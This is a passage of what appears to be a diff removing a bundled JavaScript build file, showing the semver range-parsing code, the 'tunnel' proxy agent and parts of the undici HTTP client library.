(rangeComparator) { - return thisComparator.intersects(rangeComparator, options) - }) - }) - ) - }) - ) - }) -} - -// take a set of comparators and determine whether there -// exists a version which can satisfy it -function isSatisfiable (comparators, options) { - var result = true - var remainingComparators = comparators.slice() - var testComparator = remainingComparators.pop() - - while (result && 
remainingComparators.length) { - result = remainingComparators.every(function (otherComparator) { - return testComparator.intersects(otherComparator, options) - }) - - testComparator = remainingComparators.pop() - } - - return result -} - -// Mostly just for testing and legacy API reasons -exports.toComparators = toComparators -function toComparators (range, options) { - return new Range(range, options).set.map(function (comp) { - return comp.map(function (c) { - return c.value - }).join(' ').trim().split(' ') - }) -} - -// comprised of xranges, tildes, stars, and gtlt's at this point. -// already replaced the hyphen ranges -// turn into a set of JUST comparators. -function parseComparator (comp, options) { - debug('comp', comp, options) - comp = replaceCarets(comp, options) - debug('caret', comp) - comp = replaceTildes(comp, options) - debug('tildes', comp) - comp = replaceXRanges(comp, options) - debug('xrange', comp) - comp = replaceStars(comp, options) - debug('stars', comp) - return comp -} - -function isX (id) { - return !id || id.toLowerCase() === 'x' || id === '*' -} - -// ~, ~> --> * (any, kinda silly) -// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0 <3.0.0 -// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0 <2.1.0 -// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0 -// ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0 -// ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0 -function replaceTildes (comp, options) { - return comp.trim().split(/\s+/).map(function (comp) { - return replaceTilde(comp, options) - }).join(' ') -} - -function replaceTilde (comp, options) { - var r = options.loose ? safeRe[t.TILDELOOSE] : safeRe[t.TILDE] - return comp.replace(r, function (_, M, m, p, pr) { - debug('tilde', comp, _, M, m, p, pr) - var ret - - if (isX(M)) { - ret = '' - } else if (isX(m)) { - ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' - } else if (isX(p)) { - // ~1.2 == >=1.2.0 <1.3.0 - ret = '>=' + M + '.' + m + '.0 <' + M + '.' 
+ (+m + 1) + '.0' - } else if (pr) { - debug('replaceTilde pr', pr) - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + (+m + 1) + '.0' - } else { - // ~1.2.3 == >=1.2.3 <1.3.0 - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + (+m + 1) + '.0' - } - - debug('tilde return', ret) - return ret - }) -} - -// ^ --> * (any, kinda silly) -// ^2, ^2.x, ^2.x.x --> >=2.0.0 <3.0.0 -// ^2.0, ^2.0.x --> >=2.0.0 <3.0.0 -// ^1.2, ^1.2.x --> >=1.2.0 <2.0.0 -// ^1.2.3 --> >=1.2.3 <2.0.0 -// ^1.2.0 --> >=1.2.0 <2.0.0 -function replaceCarets (comp, options) { - return comp.trim().split(/\s+/).map(function (comp) { - return replaceCaret(comp, options) - }).join(' ') -} - -function replaceCaret (comp, options) { - debug('caret', comp, options) - var r = options.loose ? safeRe[t.CARETLOOSE] : safeRe[t.CARET] - return comp.replace(r, function (_, M, m, p, pr) { - debug('caret', comp, _, M, m, p, pr) - var ret - - if (isX(M)) { - ret = '' - } else if (isX(m)) { - ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' - } else if (isX(p)) { - if (M === '0') { - ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' - } else { - ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0' - } - } else if (pr) { - debug('replaceCaret pr', pr) - if (M === '0') { - if (m === '0') { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + m + '.' + (+p + 1) - } else { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + (+m + 1) + '.0' - } - } else { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + (+M + 1) + '.0.0' - } - } else { - debug('no pr') - if (M === '0') { - if (m === '0') { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + m + '.' + (+p + 1) - } else { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + (+m + 1) + '.0' - } - } else { - ret = '>=' + M + '.' + m + '.' 
+ p + - ' <' + (+M + 1) + '.0.0' - } - } - - debug('caret return', ret) - return ret - }) -} - -function replaceXRanges (comp, options) { - debug('replaceXRanges', comp, options) - return comp.split(/\s+/).map(function (comp) { - return replaceXRange(comp, options) - }).join(' ') -} - -function replaceXRange (comp, options) { - comp = comp.trim() - var r = options.loose ? safeRe[t.XRANGELOOSE] : safeRe[t.XRANGE] - return comp.replace(r, function (ret, gtlt, M, m, p, pr) { - debug('xRange', comp, ret, gtlt, M, m, p, pr) - var xM = isX(M) - var xm = xM || isX(m) - var xp = xm || isX(p) - var anyX = xp - - if (gtlt === '=' && anyX) { - gtlt = '' - } - - // if we're including prereleases in the match, then we need - // to fix this to -0, the lowest possible prerelease value - pr = options.includePrerelease ? '-0' : '' - - if (xM) { - if (gtlt === '>' || gtlt === '<') { - // nothing is allowed - ret = '<0.0.0-0' - } else { - // nothing is forbidden - ret = '*' - } - } else if (gtlt && anyX) { - // we know patch is an x, because we have any x at all. - // replace X with 0 - if (xm) { - m = 0 - } - p = 0 - - if (gtlt === '>') { - // >1 => >=2.0.0 - // >1.2 => >=1.3.0 - // >1.2.3 => >= 1.2.4 - gtlt = '>=' - if (xm) { - M = +M + 1 - m = 0 - p = 0 - } else { - m = +m + 1 - p = 0 - } - } else if (gtlt === '<=') { - // <=0.7.x is actually <0.8.0, since any 0.7.x should - // pass. Similarly, <=7.x is actually <8.0.0, etc. - gtlt = '<' - if (xm) { - M = +M + 1 - } else { - m = +m + 1 - } - } - - ret = gtlt + M + '.' + m + '.' + p + pr - } else if (xm) { - ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr - } else if (xp) { - ret = '>=' + M + '.' + m + '.0' + pr + - ' <' + M + '.' + (+m + 1) + '.0' + pr - } - - debug('xRange return', ret) - - return ret - }) -} - -// Because * is AND-ed with everything else in the comparator, -// and '' means "any version", just remove the *s entirely. 
-function replaceStars (comp, options) { - debug('replaceStars', comp, options) - // Looseness is ignored here. star is always as loose as it gets! - return comp.trim().replace(safeRe[t.STAR], '') -} - -// This function is passed to string.replace(re[t.HYPHENRANGE]) -// M, m, patch, prerelease, build -// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5 -// 1.2.3 - 3.4 => >=1.2.0 <3.5.0 Any 3.4.x will do -// 1.2 - 3.4 => >=1.2.0 <3.5.0 -function hyphenReplace ($0, - from, fM, fm, fp, fpr, fb, - to, tM, tm, tp, tpr, tb) { - if (isX(fM)) { - from = '' - } else if (isX(fm)) { - from = '>=' + fM + '.0.0' - } else if (isX(fp)) { - from = '>=' + fM + '.' + fm + '.0' - } else { - from = '>=' + from - } - - if (isX(tM)) { - to = '' - } else if (isX(tm)) { - to = '<' + (+tM + 1) + '.0.0' - } else if (isX(tp)) { - to = '<' + tM + '.' + (+tm + 1) + '.0' - } else if (tpr) { - to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr - } else { - to = '<=' + to - } - - return (from + ' ' + to).trim() -} - -// if ANY of the sets match ALL of its comparators, then pass -Range.prototype.test = function (version) { - if (!version) { - return false - } - - if (typeof version === 'string') { - try { - version = new SemVer(version, this.options) - } catch (er) { - return false - } - } - - for (var i = 0; i < this.set.length; i++) { - if (testSet(this.set[i], version, this.options)) { - return true - } - } - return false -} - -function testSet (set, version, options) { - for (var i = 0; i < set.length; i++) { - if (!set[i].test(version)) { - return false - } - } - - if (version.prerelease.length && !options.includePrerelease) { - // Find the set of versions that are allowed to have prereleases - // For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0 - // That should allow `1.2.3-pr.2` to pass. - // However, `1.2.4-alpha.notready` should NOT be allowed, - // even though it's within the range set by the comparators. 
- for (i = 0; i < set.length; i++) { - debug(set[i].semver) - if (set[i].semver === ANY) { - continue - } - - if (set[i].semver.prerelease.length > 0) { - var allowed = set[i].semver - if (allowed.major === version.major && - allowed.minor === version.minor && - allowed.patch === version.patch) { - return true - } - } - } - - // Version has a -pre, but it's not one of the ones we like. - return false - } - - return true -} - -exports.satisfies = satisfies -function satisfies (version, range, options) { - try { - range = new Range(range, options) - } catch (er) { - return false - } - return range.test(version) -} - -exports.maxSatisfying = maxSatisfying -function maxSatisfying (versions, range, options) { - var max = null - var maxSV = null - try { - var rangeObj = new Range(range, options) - } catch (er) { - return null - } - versions.forEach(function (v) { - if (rangeObj.test(v)) { - // satisfies(v, range, options) - if (!max || maxSV.compare(v) === -1) { - // compare(max, v, true) - max = v - maxSV = new SemVer(max, options) - } - } - }) - return max -} - -exports.minSatisfying = minSatisfying -function minSatisfying (versions, range, options) { - var min = null - var minSV = null - try { - var rangeObj = new Range(range, options) - } catch (er) { - return null - } - versions.forEach(function (v) { - if (rangeObj.test(v)) { - // satisfies(v, range, options) - if (!min || minSV.compare(v) === 1) { - // compare(min, v, true) - min = v - minSV = new SemVer(min, options) - } - } - }) - return min -} - -exports.minVersion = minVersion -function minVersion (range, loose) { - range = new Range(range, loose) - - var minver = new SemVer('0.0.0') - if (range.test(minver)) { - return minver - } - - minver = new SemVer('0.0.0-0') - if (range.test(minver)) { - return minver - } - - minver = null - for (var i = 0; i < range.set.length; ++i) { - var comparators = range.set[i] - - comparators.forEach(function (comparator) { - // Clone to avoid manipulating the comparator's 
semver object. - var compver = new SemVer(comparator.semver.version) - switch (comparator.operator) { - case '>': - if (compver.prerelease.length === 0) { - compver.patch++ - } else { - compver.prerelease.push(0) - } - compver.raw = compver.format() - /* fallthrough */ - case '': - case '>=': - if (!minver || gt(minver, compver)) { - minver = compver - } - break - case '<': - case '<=': - /* Ignore maximum versions */ - break - /* istanbul ignore next */ - default: - throw new Error('Unexpected operation: ' + comparator.operator) - } - }) - } - - if (minver && range.test(minver)) { - return minver - } - - return null -} - -exports.validRange = validRange -function validRange (range, options) { - try { - // Return '*' instead of '' so that truthiness works. - // This will throw if it's invalid anyway - return new Range(range, options).range || '*' - } catch (er) { - return null - } -} - -// Determine if version is less than all the versions possible in the range -exports.ltr = ltr -function ltr (version, range, options) { - return outside(version, range, '<', options) -} - -// Determine if version is greater than all the versions possible in the range. -exports.gtr = gtr -function gtr (version, range, options) { - return outside(version, range, '>', options) -} - -exports.outside = outside -function outside (version, range, hilo, options) { - version = new SemVer(version, options) - range = new Range(range, options) - - var gtfn, ltefn, ltfn, comp, ecomp - switch (hilo) { - case '>': - gtfn = gt - ltefn = lte - ltfn = lt - comp = '>' - ecomp = '>=' - break - case '<': - gtfn = lt - ltefn = gte - ltfn = gt - comp = '<' - ecomp = '<=' - break - default: - throw new TypeError('Must provide a hilo val of "<" or ">"') - } - - // If it satisifes the range it is not outside - if (satisfies(version, range, options)) { - return false - } - - // From now on, variable terms are as if we're in "gtr" mode. - // but note that everything is flipped for the "ltr" function. 
- - for (var i = 0; i < range.set.length; ++i) { - var comparators = range.set[i] - - var high = null - var low = null - - comparators.forEach(function (comparator) { - if (comparator.semver === ANY) { - comparator = new Comparator('>=0.0.0') - } - high = high || comparator - low = low || comparator - if (gtfn(comparator.semver, high.semver, options)) { - high = comparator - } else if (ltfn(comparator.semver, low.semver, options)) { - low = comparator - } - }) - - // If the edge version comparator has a operator then our version - // isn't outside it - if (high.operator === comp || high.operator === ecomp) { - return false - } - - // If the lowest version comparator has an operator and our version - // is less than it then it isn't higher than the range - if ((!low.operator || low.operator === comp) && - ltefn(version, low.semver)) { - return false - } else if (low.operator === ecomp && ltfn(version, low.semver)) { - return false - } - } - return true -} - -exports.prerelease = prerelease -function prerelease (version, options) { - var parsed = parse(version, options) - return (parsed && parsed.prerelease.length) ? parsed.prerelease : null -} - -exports.intersects = intersects -function intersects (r1, r2, options) { - r1 = new Range(r1, options) - r2 = new Range(r2, options) - return r1.intersects(r2) -} - -exports.coerce = coerce -function coerce (version, options) { - if (version instanceof SemVer) { - return version - } - - if (typeof version === 'number') { - version = String(version) - } - - if (typeof version !== 'string') { - return null - } - - options = options || {} - - var match = null - if (!options.rtl) { - match = version.match(safeRe[t.COERCE]) - } else { - // Find the right-most coercible string that does not share - // a terminus with a more left-ward coercible string. 
- // Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4' - // - // Walk through the string checking with a /g regexp - // Manually set the index so as to pick up overlapping matches. - // Stop when we get a match that ends at the string end, since no - // coercible string can be more right-ward without the same terminus. - var next - while ((next = safeRe[t.COERCERTL].exec(version)) && - (!match || match.index + match[0].length !== version.length) - ) { - if (!match || - next.index + next[0].length !== match.index + match[0].length) { - match = next - } - safeRe[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length - } - // leave it in a clean state - safeRe[t.COERCERTL].lastIndex = -1 - } - - if (match === null) { - return null - } - - return parse(match[2] + - '.' + (match[3] || '0') + - '.' + (match[4] || '0'), options) -} - - -/***/ }), - -/***/ 4294: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -module.exports = __nccwpck_require__(4219); - - -/***/ }), - -/***/ 4219: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -var net = __nccwpck_require__(1808); -var tls = __nccwpck_require__(4404); -var http = __nccwpck_require__(3685); -var https = __nccwpck_require__(5687); -var events = __nccwpck_require__(2361); -var assert = __nccwpck_require__(9491); -var util = __nccwpck_require__(3837); - - -exports.httpOverHttp = httpOverHttp; -exports.httpsOverHttp = httpsOverHttp; -exports.httpOverHttps = httpOverHttps; -exports.httpsOverHttps = httpsOverHttps; - - -function httpOverHttp(options) { - var agent = new TunnelingAgent(options); - agent.request = http.request; - return agent; -} - -function httpsOverHttp(options) { - var agent = new TunnelingAgent(options); - agent.request = http.request; - agent.createSocket = createSecureSocket; - agent.defaultPort = 443; - return agent; -} - -function httpOverHttps(options) { - var agent = new TunnelingAgent(options); - agent.request = 
https.request; - return agent; -} - -function httpsOverHttps(options) { - var agent = new TunnelingAgent(options); - agent.request = https.request; - agent.createSocket = createSecureSocket; - agent.defaultPort = 443; - return agent; -} - - -function TunnelingAgent(options) { - var self = this; - self.options = options || {}; - self.proxyOptions = self.options.proxy || {}; - self.maxSockets = self.options.maxSockets || http.Agent.defaultMaxSockets; - self.requests = []; - self.sockets = []; - - self.on('free', function onFree(socket, host, port, localAddress) { - var options = toOptions(host, port, localAddress); - for (var i = 0, len = self.requests.length; i < len; ++i) { - var pending = self.requests[i]; - if (pending.host === options.host && pending.port === options.port) { - // Detect the request to connect same origin server, - // reuse the connection. - self.requests.splice(i, 1); - pending.request.onSocket(socket); - return; - } - } - socket.destroy(); - self.removeSocket(socket); - }); -} -util.inherits(TunnelingAgent, events.EventEmitter); - -TunnelingAgent.prototype.addRequest = function addRequest(req, host, port, localAddress) { - var self = this; - var options = mergeOptions({request: req}, self.options, toOptions(host, port, localAddress)); - - if (self.sockets.length >= this.maxSockets) { - // We are over limit so we'll add it to the queue. - self.requests.push(options); - return; - } - - // If we are under maxSockets create a new one. 
- self.createSocket(options, function(socket) { - socket.on('free', onFree); - socket.on('close', onCloseOrRemove); - socket.on('agentRemove', onCloseOrRemove); - req.onSocket(socket); - - function onFree() { - self.emit('free', socket, options); - } - - function onCloseOrRemove(err) { - self.removeSocket(socket); - socket.removeListener('free', onFree); - socket.removeListener('close', onCloseOrRemove); - socket.removeListener('agentRemove', onCloseOrRemove); - } - }); -}; - -TunnelingAgent.prototype.createSocket = function createSocket(options, cb) { - var self = this; - var placeholder = {}; - self.sockets.push(placeholder); - - var connectOptions = mergeOptions({}, self.proxyOptions, { - method: 'CONNECT', - path: options.host + ':' + options.port, - agent: false, - headers: { - host: options.host + ':' + options.port - } - }); - if (options.localAddress) { - connectOptions.localAddress = options.localAddress; - } - if (connectOptions.proxyAuth) { - connectOptions.headers = connectOptions.headers || {}; - connectOptions.headers['Proxy-Authorization'] = 'Basic ' + - new Buffer(connectOptions.proxyAuth).toString('base64'); - } - - debug('making CONNECT request'); - var connectReq = self.request(connectOptions); - connectReq.useChunkedEncodingByDefault = false; // for v0.6 - connectReq.once('response', onResponse); // for v0.6 - connectReq.once('upgrade', onUpgrade); // for v0.6 - connectReq.once('connect', onConnect); // for v0.7 or later - connectReq.once('error', onError); - connectReq.end(); - - function onResponse(res) { - // Very hacky. This is necessary to avoid http-parser leaks. - res.upgrade = true; - } - - function onUpgrade(res, socket, head) { - // Hacky. 
- process.nextTick(function() { - onConnect(res, socket, head); - }); - } - - function onConnect(res, socket, head) { - connectReq.removeAllListeners(); - socket.removeAllListeners(); - - if (res.statusCode !== 200) { - debug('tunneling socket could not be established, statusCode=%d', - res.statusCode); - socket.destroy(); - var error = new Error('tunneling socket could not be established, ' + - 'statusCode=' + res.statusCode); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - return; - } - if (head.length > 0) { - debug('got illegal response body from proxy'); - socket.destroy(); - var error = new Error('got illegal response body from proxy'); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - return; - } - debug('tunneling connection has established'); - self.sockets[self.sockets.indexOf(placeholder)] = socket; - return cb(socket); - } - - function onError(cause) { - connectReq.removeAllListeners(); - - debug('tunneling socket could not be established, cause=%s\n', - cause.message, cause.stack); - var error = new Error('tunneling socket could not be established, ' + - 'cause=' + cause.message); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - } -}; - -TunnelingAgent.prototype.removeSocket = function removeSocket(socket) { - var pos = this.sockets.indexOf(socket) - if (pos === -1) { - return; - } - this.sockets.splice(pos, 1); - - var pending = this.requests.shift(); - if (pending) { - // If we have pending requests and a socket gets closed a new one - // needs to be created to take over in the pool for the one that closed. 
- this.createSocket(pending, function(socket) { - pending.request.onSocket(socket); - }); - } -}; - -function createSecureSocket(options, cb) { - var self = this; - TunnelingAgent.prototype.createSocket.call(self, options, function(socket) { - var hostHeader = options.request.getHeader('host'); - var tlsOptions = mergeOptions({}, self.options, { - socket: socket, - servername: hostHeader ? hostHeader.replace(/:.*$/, '') : options.host - }); - - // 0 is dummy port for v0.6 - var secureSocket = tls.connect(0, tlsOptions); - self.sockets[self.sockets.indexOf(socket)] = secureSocket; - cb(secureSocket); - }); -} - - -function toOptions(host, port, localAddress) { - if (typeof host === 'string') { // since v0.10 - return { - host: host, - port: port, - localAddress: localAddress - }; - } - return host; // for v0.11 or later -} - -function mergeOptions(target) { - for (var i = 1, len = arguments.length; i < len; ++i) { - var overrides = arguments[i]; - if (typeof overrides === 'object') { - var keys = Object.keys(overrides); - for (var j = 0, keyLen = keys.length; j < keyLen; ++j) { - var k = keys[j]; - if (overrides[k] !== undefined) { - target[k] = overrides[k]; - } - } - } - } - return target; -} - - -var debug; -if (process.env.NODE_DEBUG && /\btunnel\b/.test(process.env.NODE_DEBUG)) { - debug = function() { - var args = Array.prototype.slice.call(arguments); - if (typeof args[0] === 'string') { - args[0] = 'TUNNEL: ' + args[0]; - } else { - args.unshift('TUNNEL:'); - } - console.error.apply(console, args); - } -} else { - debug = function() {}; -} -exports.debug = debug; // for test - - -/***/ }), - -/***/ 1773: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Client = __nccwpck_require__(3598) -const Dispatcher = __nccwpck_require__(412) -const errors = __nccwpck_require__(8045) -const Pool = __nccwpck_require__(4634) -const BalancedPool = __nccwpck_require__(7931) -const Agent = __nccwpck_require__(7890) -const util 
= __nccwpck_require__(3983) -const { InvalidArgumentError } = errors -const api = __nccwpck_require__(4059) -const buildConnector = __nccwpck_require__(2067) -const MockClient = __nccwpck_require__(8687) -const MockAgent = __nccwpck_require__(6771) -const MockPool = __nccwpck_require__(6193) -const mockErrors = __nccwpck_require__(888) -const ProxyAgent = __nccwpck_require__(7858) -const RetryHandler = __nccwpck_require__(2286) -const { getGlobalDispatcher, setGlobalDispatcher } = __nccwpck_require__(1892) -const DecoratorHandler = __nccwpck_require__(6930) -const RedirectHandler = __nccwpck_require__(2860) -const createRedirectInterceptor = __nccwpck_require__(8861) - -let hasCrypto -try { - __nccwpck_require__(6113) - hasCrypto = true -} catch { - hasCrypto = false -} - -Object.assign(Dispatcher.prototype, api) - -module.exports.Dispatcher = Dispatcher -module.exports.Client = Client -module.exports.Pool = Pool -module.exports.BalancedPool = BalancedPool -module.exports.Agent = Agent -module.exports.ProxyAgent = ProxyAgent -module.exports.RetryHandler = RetryHandler - -module.exports.DecoratorHandler = DecoratorHandler -module.exports.RedirectHandler = RedirectHandler -module.exports.createRedirectInterceptor = createRedirectInterceptor - -module.exports.buildConnector = buildConnector -module.exports.errors = errors - -function makeDispatcher (fn) { - return (url, opts, handler) => { - if (typeof opts === 'function') { - handler = opts - opts = null - } - - if (!url || (typeof url !== 'string' && typeof url !== 'object' && !(url instanceof URL))) { - throw new InvalidArgumentError('invalid url') - } - - if (opts != null && typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (opts && opts.path != null) { - if (typeof opts.path !== 'string') { - throw new InvalidArgumentError('invalid opts.path') - } - - let path = opts.path - if (!opts.path.startsWith('/')) { - path = `/${path}` - } - - url = new 
URL(util.parseOrigin(url).origin + path) - } else { - if (!opts) { - opts = typeof url === 'object' ? url : {} - } - - url = util.parseURL(url) - } - - const { agent, dispatcher = getGlobalDispatcher() } = opts - - if (agent) { - throw new InvalidArgumentError('unsupported opts.agent. Did you mean opts.client?') - } - - return fn.call(dispatcher, { - ...opts, - origin: url.origin, - path: url.search ? `${url.pathname}${url.search}` : url.pathname, - method: opts.method || (opts.body ? 'PUT' : 'GET') - }, handler) - } -} - -module.exports.setGlobalDispatcher = setGlobalDispatcher -module.exports.getGlobalDispatcher = getGlobalDispatcher - -if (util.nodeMajor > 16 || (util.nodeMajor === 16 && util.nodeMinor >= 8)) { - let fetchImpl = null - module.exports.fetch = async function fetch (resource) { - if (!fetchImpl) { - fetchImpl = (__nccwpck_require__(4881).fetch) - } - - try { - return await fetchImpl(...arguments) - } catch (err) { - if (typeof err === 'object') { - Error.captureStackTrace(err, this) - } - - throw err - } - } - module.exports.Headers = __nccwpck_require__(554).Headers - module.exports.Response = __nccwpck_require__(7823).Response - module.exports.Request = __nccwpck_require__(8359).Request - module.exports.FormData = __nccwpck_require__(2015).FormData - module.exports.File = __nccwpck_require__(8511).File - module.exports.FileReader = __nccwpck_require__(1446).FileReader - - const { setGlobalOrigin, getGlobalOrigin } = __nccwpck_require__(1246) - - module.exports.setGlobalOrigin = setGlobalOrigin - module.exports.getGlobalOrigin = getGlobalOrigin - - const { CacheStorage } = __nccwpck_require__(7907) - const { kConstruct } = __nccwpck_require__(9174) - - // Cache & CacheStorage are tightly coupled with fetch. Even if it may run - // in an older version of Node, it doesn't have any use without fetch. 
- module.exports.caches = new CacheStorage(kConstruct) -} - -if (util.nodeMajor >= 16) { - const { deleteCookie, getCookies, getSetCookies, setCookie } = __nccwpck_require__(1724) - - module.exports.deleteCookie = deleteCookie - module.exports.getCookies = getCookies - module.exports.getSetCookies = getSetCookies - module.exports.setCookie = setCookie - - const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) - - module.exports.parseMIMEType = parseMIMEType - module.exports.serializeAMimeType = serializeAMimeType -} - -if (util.nodeMajor >= 18 && hasCrypto) { - const { WebSocket } = __nccwpck_require__(4284) - - module.exports.WebSocket = WebSocket -} - -module.exports.request = makeDispatcher(api.request) -module.exports.stream = makeDispatcher(api.stream) -module.exports.pipeline = makeDispatcher(api.pipeline) -module.exports.connect = makeDispatcher(api.connect) -module.exports.upgrade = makeDispatcher(api.upgrade) - -module.exports.MockClient = MockClient -module.exports.MockPool = MockPool -module.exports.MockAgent = MockAgent -module.exports.mockErrors = mockErrors - - -/***/ }), - -/***/ 7890: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { kClients, kRunning, kClose, kDestroy, kDispatch, kInterceptors } = __nccwpck_require__(2785) -const DispatcherBase = __nccwpck_require__(4839) -const Pool = __nccwpck_require__(4634) -const Client = __nccwpck_require__(3598) -const util = __nccwpck_require__(3983) -const createRedirectInterceptor = __nccwpck_require__(8861) -const { WeakRef, FinalizationRegistry } = __nccwpck_require__(6436)() - -const kOnConnect = Symbol('onConnect') -const kOnDisconnect = Symbol('onDisconnect') -const kOnConnectionError = Symbol('onConnectionError') -const kMaxRedirections = Symbol('maxRedirections') -const kOnDrain = Symbol('onDrain') -const kFactory = Symbol('factory') -const kFinalizer = Symbol('finalizer') 
-const kOptions = Symbol('options') - -function defaultFactory (origin, opts) { - return opts && opts.connections === 1 - ? new Client(origin, opts) - : new Pool(origin, opts) -} - -class Agent extends DispatcherBase { - constructor ({ factory = defaultFactory, maxRedirections = 0, connect, ...options } = {}) { - super() - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (!Number.isInteger(maxRedirections) || maxRedirections < 0) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - if (connect && typeof connect !== 'function') { - connect = { ...connect } - } - - this[kInterceptors] = options.interceptors && options.interceptors.Agent && Array.isArray(options.interceptors.Agent) - ? options.interceptors.Agent - : [createRedirectInterceptor({ maxRedirections })] - - this[kOptions] = { ...util.deepClone(options), connect } - this[kOptions].interceptors = options.interceptors - ? 
{ ...options.interceptors } - : undefined - this[kMaxRedirections] = maxRedirections - this[kFactory] = factory - this[kClients] = new Map() - this[kFinalizer] = new FinalizationRegistry(/* istanbul ignore next: gc is undeterministic */ key => { - const ref = this[kClients].get(key) - if (ref !== undefined && ref.deref() === undefined) { - this[kClients].delete(key) - } - }) - - const agent = this - - this[kOnDrain] = (origin, targets) => { - agent.emit('drain', origin, [agent, ...targets]) - } - - this[kOnConnect] = (origin, targets) => { - agent.emit('connect', origin, [agent, ...targets]) - } - - this[kOnDisconnect] = (origin, targets, err) => { - agent.emit('disconnect', origin, [agent, ...targets], err) - } - - this[kOnConnectionError] = (origin, targets, err) => { - agent.emit('connectionError', origin, [agent, ...targets], err) - } - } - - get [kRunning] () { - let ret = 0 - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore next: gc is undeterministic */ - if (client) { - ret += client[kRunning] - } - } - return ret - } - - [kDispatch] (opts, handler) { - let key - if (opts.origin && (typeof opts.origin === 'string' || opts.origin instanceof URL)) { - key = String(opts.origin) - } else { - throw new InvalidArgumentError('opts.origin must be a non-empty string or URL.') - } - - const ref = this[kClients].get(key) - - let dispatcher = ref ? 
ref.deref() : null - if (!dispatcher) { - dispatcher = this[kFactory](opts.origin, this[kOptions]) - .on('drain', this[kOnDrain]) - .on('connect', this[kOnConnect]) - .on('disconnect', this[kOnDisconnect]) - .on('connectionError', this[kOnConnectionError]) - - this[kClients].set(key, new WeakRef(dispatcher)) - this[kFinalizer].register(dispatcher, key) - } - - return dispatcher.dispatch(opts, handler) - } - - async [kClose] () { - const closePromises = [] - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore else: gc is undeterministic */ - if (client) { - closePromises.push(client.close()) - } - } - - await Promise.all(closePromises) - } - - async [kDestroy] (err) { - const destroyPromises = [] - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore else: gc is undeterministic */ - if (client) { - destroyPromises.push(client.destroy(err)) - } - } - - await Promise.all(destroyPromises) - } -} - -module.exports = Agent - - -/***/ }), - -/***/ 7032: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const { addAbortListener } = __nccwpck_require__(3983) -const { RequestAbortedError } = __nccwpck_require__(8045) - -const kListener = Symbol('kListener') -const kSignal = Symbol('kSignal') - -function abort (self) { - if (self.abort) { - self.abort() - } else { - self.onError(new RequestAbortedError()) - } -} - -function addSignal (self, signal) { - self[kSignal] = null - self[kListener] = null - - if (!signal) { - return - } - - if (signal.aborted) { - abort(self) - return - } - - self[kSignal] = signal - self[kListener] = () => { - abort(self) - } - - addAbortListener(self[kSignal], self[kListener]) -} - -function removeSignal (self) { - if (!self[kSignal]) { - return - } - - if ('removeEventListener' in self[kSignal]) { - self[kSignal].removeEventListener('abort', self[kListener]) - } else { - self[kSignal].removeListener('abort', self[kListener]) - } - - 
self[kSignal] = null - self[kListener] = null -} - -module.exports = { - addSignal, - removeSignal -} - - -/***/ }), - -/***/ 9744: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { AsyncResource } = __nccwpck_require__(852) -const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class ConnectHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - const { signal, opaque, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - super('UNDICI_CONNECT') - - this.opaque = opaque || null - this.responseHeaders = responseHeaders || null - this.callback = callback - this.abort = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders () { - throw new SocketError('bad connect', null) - } - - onUpgrade (statusCode, rawHeaders, socket) { - const { callback, opaque, context } = this - - 